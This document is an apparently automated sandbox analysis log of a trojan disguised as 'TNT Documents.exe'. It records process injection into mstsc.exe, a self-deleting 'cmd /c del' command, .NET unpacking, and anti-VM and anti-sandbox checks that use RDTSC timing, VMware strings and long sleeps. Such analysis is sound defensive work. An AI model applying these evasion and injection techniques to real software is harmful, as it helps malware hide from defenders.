Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567D466 17_2_0567D466
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C841F 17_2_055C841F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05681FF1 17_2_05681FF1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D6E30 17_2_055D6E30
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567D616 17_2_0567D616
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05682EF7 17_2_05682EF7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BF900 17_2_055BF900
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671002 17_2_05671002
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056828EC 17_2_056828EC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056820A8 17_2_056820A8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CB090 17_2_055CB090
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05682B28 17_2_05682B28
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567DBD2 17_2_0567DBD2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EEBB0 17_2_055EEBB0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056822AE 17_2_056822AE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03312FB0 17_2_03312FB0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03312D90 17_2_03312D90
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03312D87 17_2_03312D87
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03318C90 17_2_03318C90
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03318C8B 17_2_03318C8B
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: String function: 0155B150 appears 35 times
Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 055BB150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004185F0 NtCreateFile, 7_2_004185F0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004186A0 NtReadFile, 7_2_004186A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00418720 NtClose, 7_2_00418720
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004187D0 NtAllocateVirtualMemory, 7_2_004187D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004185EA NtCreateFile, 7_2_004185EA
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00418642 NtReadFile, 7_2_00418642
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0041869A NtReadFile, 7_2_0041869A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004187CB NtAllocateVirtualMemory, 7_2_004187CB
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599910 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_01599910
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015999A0 NtCreateSection,LdrInitializeThunk, 7_2_015999A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599840 NtDelayExecution,LdrInitializeThunk, 7_2_01599840
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599860 NtQuerySystemInformation,LdrInitializeThunk, 7_2_01599860
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015998F0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_015998F0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599A50 NtCreateFile,LdrInitializeThunk, 7_2_01599A50
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599A00 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_01599A00
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599A20 NtResumeThread,LdrInitializeThunk, 7_2_01599A20
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599540 NtReadFile,LdrInitializeThunk, 7_2_01599540
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015995D0 NtClose,LdrInitializeThunk, 7_2_015995D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599710 NtQueryInformationToken,LdrInitializeThunk, 7_2_01599710
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599FE0 NtCreateMutant,LdrInitializeThunk, 7_2_01599FE0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599780 NtMapViewOfSection,LdrInitializeThunk, 7_2_01599780
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015997A0 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_015997A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599660 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_01599660
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015996E0 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_015996E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599950 NtQueueApcThread, 7_2_01599950
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015999D0 NtCreateProcessEx, 7_2_015999D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159B040 NtSuspendThread, 7_2_0159B040
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599820 NtEnumerateKey, 7_2_01599820
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015998A0 NtWriteVirtualMemory, 7_2_015998A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599B00 NtSetValueKey, 7_2_01599B00
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159A3B0 NtGetContextThread, 7_2_0159A3B0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599A10 NtQuerySection, 7_2_01599A10
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599A80 NtOpenDirectoryObject, 7_2_01599A80
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599560 NtWriteFile, 7_2_01599560
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159AD30 NtSetContextThread, 7_2_0159AD30
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599520 NtWaitForSingleObject, 7_2_01599520
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015995F0 NtQueryInformationFile, 7_2_015995F0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159A770 NtOpenThread, 7_2_0159A770
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599770 NtSetInformationFile, 7_2_01599770
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599760 NtOpenProcess, 7_2_01599760
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159A710 NtOpenProcessToken, 7_2_0159A710
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599730 NtQueryVirtualMemory, 7_2_01599730
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599650 NtQueryValueKey, 7_2_01599650
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599670 NtQueryInformationProcess, 7_2_01599670
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599610 NtEnumerateValueKey, 7_2_01599610
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015996D0 NtCreateKey, 7_2_015996D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9540 NtReadFile,LdrInitializeThunk, 17_2_055F9540
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F95D0 NtClose,LdrInitializeThunk, 17_2_055F95D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9710 NtQueryInformationToken,LdrInitializeThunk, 17_2_055F9710
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9FE0 NtCreateMutant,LdrInitializeThunk, 17_2_055F9FE0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9780 NtMapViewOfSection,LdrInitializeThunk, 17_2_055F9780
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9650 NtQueryValueKey,LdrInitializeThunk, 17_2_055F9650
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 17_2_055F9660
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F96D0 NtCreateKey,LdrInitializeThunk, 17_2_055F96D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F96E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_055F96E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_055F9910
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F99A0 NtCreateSection,LdrInitializeThunk, 17_2_055F99A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9840 NtDelayExecution,LdrInitializeThunk, 17_2_055F9840
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_055F9860
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9A50 NtCreateFile,LdrInitializeThunk, 17_2_055F9A50
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9560 NtWriteFile, 17_2_055F9560
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055FAD30 NtSetContextThread, 17_2_055FAD30
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9520 NtWaitForSingleObject, 17_2_055F9520
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F95F0 NtQueryInformationFile, 17_2_055F95F0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055FA770 NtOpenThread, 17_2_055FA770
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9770 NtSetInformationFile, 17_2_055F9770
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9760 NtOpenProcess, 17_2_055F9760
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055FA710 NtOpenProcessToken, 17_2_055FA710
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9730 NtQueryVirtualMemory, 17_2_055F9730
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F97A0 NtUnmapViewOfSection, 17_2_055F97A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9670 NtQueryInformationProcess, 17_2_055F9670
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9610 NtEnumerateValueKey, 17_2_055F9610
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9950 NtQueueApcThread, 17_2_055F9950
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F99D0 NtCreateProcessEx, 17_2_055F99D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055FB040 NtSuspendThread, 17_2_055FB040
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9820 NtEnumerateKey, 17_2_055F9820
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F98F0 NtReadVirtualMemory, 17_2_055F98F0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F98A0 NtWriteVirtualMemory, 17_2_055F98A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9B00 NtSetValueKey, 17_2_055F9B00
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055FA3B0 NtGetContextThread, 17_2_055FA3B0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9A10 NtQuerySection, 17_2_055F9A10
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9A00 NtProtectVirtualMemory, 17_2_055F9A00
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9A20 NtResumeThread, 17_2_055F9A20
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9A80 NtOpenDirectoryObject, 17_2_055F9A80
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03328720 NtClose, 17_2_03328720
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_033287D0 NtAllocateVirtualMemory, 17_2_033287D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_033286A0 NtReadFile, 17_2_033286A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_033285F0 NtCreateFile, 17_2_033285F0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_033287CB NtAllocateVirtualMemory, 17_2_033287CB
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03328642 NtReadFile, 17_2_03328642
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0332869A NtReadFile, 17_2_0332869A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_033285EA NtCreateFile, 17_2_033285EA
Sample file is different than original file name gathered from version info
Source: TNT Documents.exe, 00000000.00000000.252292198.00000000000EE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
Source: TNT Documents.exe, 00000000.00000002.300957032.0000000006DC0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
Source: TNT Documents.exe, 00000000.00000002.294580237.00000000026F2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
Source: TNT Documents.exe, 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameBunifu.UI.dll4 vs TNT Documents.exe
Source: TNT Documents.exe, 00000005.00000000.280071270.00000000001AE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
Source: TNT Documents.exe, 00000007.00000000.286422780.0000000000B1E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
Source: TNT Documents.exe, 00000007.00000002.362999077.0000000003523000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamemstsc.exej% vs TNT Documents.exe
Source: TNT Documents.exe, 00000007.00000002.362181801.00000000017DF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
Source: TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
Source: TNT Documents.exe Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
Source: TNT Documents.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: TNT Documents.exe ReversingLabs: Detection: 46%
Source: TNT Documents.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\TNT Documents.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\TNT Documents.exe "C:\Users\user\Desktop\TNT Documents.exe"
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
Source: C:\Users\user\Desktop\TNT Documents.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TNT Documents.exe.log
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/1@10/4
Source: C:\Users\user\Desktop\TNT Documents.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\TNT Documents.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: TNT Documents.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: TNT Documents.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: TNT Documents.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: TNT Documents.exe, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_00080576 push ebx; iretd 0_2_000805B7
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E70ABA pushfd ; iretd 0_2_06E70ABC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 5_2_00140576 push ebx; iretd 5_2_001405B7
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0041B832 push eax; ret 7_2_0041B838
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0041B83B push eax; ret 7_2_0041B8A2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0041B89C push eax; ret 7_2_0041B8A2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0040825A push ecx; retf 7_2_0040825B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0040C38A pushfd ; ret 7_2_0040C3A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00415CC4 push FFFFFFDFh; iretd 7_2_00415CDA
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0041B7E5 push eax; ret 7_2_0041B838
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00AB0576 push ebx; iretd 7_2_00AB05B7
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015AD0D1 push ecx; ret 7_2_015AD0E4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0560D0D1 push ecx; ret 17_2_0560D0E4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0331C38A pushfd ; ret 17_2_0331C3A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0331825A push ecx; retf 17_2_0331825B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0332B832 push eax; ret 17_2_0332B838
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0332B83B push eax; ret 17_2_0332B8A2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0332B89C push eax; ret 17_2_0332B8A2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0332B7E5 push eax; ret 17_2_0332B838
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03325CC4 push FFFFFFDFh; iretd 17_2_03325CDA
Binary contains a suspicious time stamp
Source: TNT Documents.exe Static PE information: 0xA539E86C [Sat Nov 3 17:54:52 2057 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.56105630003

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\mstsc.exe Process created: /c del "C:\Users\user\Desktop\TNT Documents.exe"
Source: C:\Windows\SysWOW64\mstsc.exe Process created: /c del "C:\Users\user\Desktop\TNT Documents.exe"
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mstsc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: TNT Documents.exe PID: 4548, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\TNT Documents.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNT Documents.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000003318614 second address: 000000000331861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 00000000033189AE second address: 00000000033189B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\TNT Documents.exe TID: 5188 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004088E0 rdtsc 7_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\TNT Documents.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\TNT Documents.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000B.00000000.309276039.000000000ED78000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000B.00000000.298506976.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
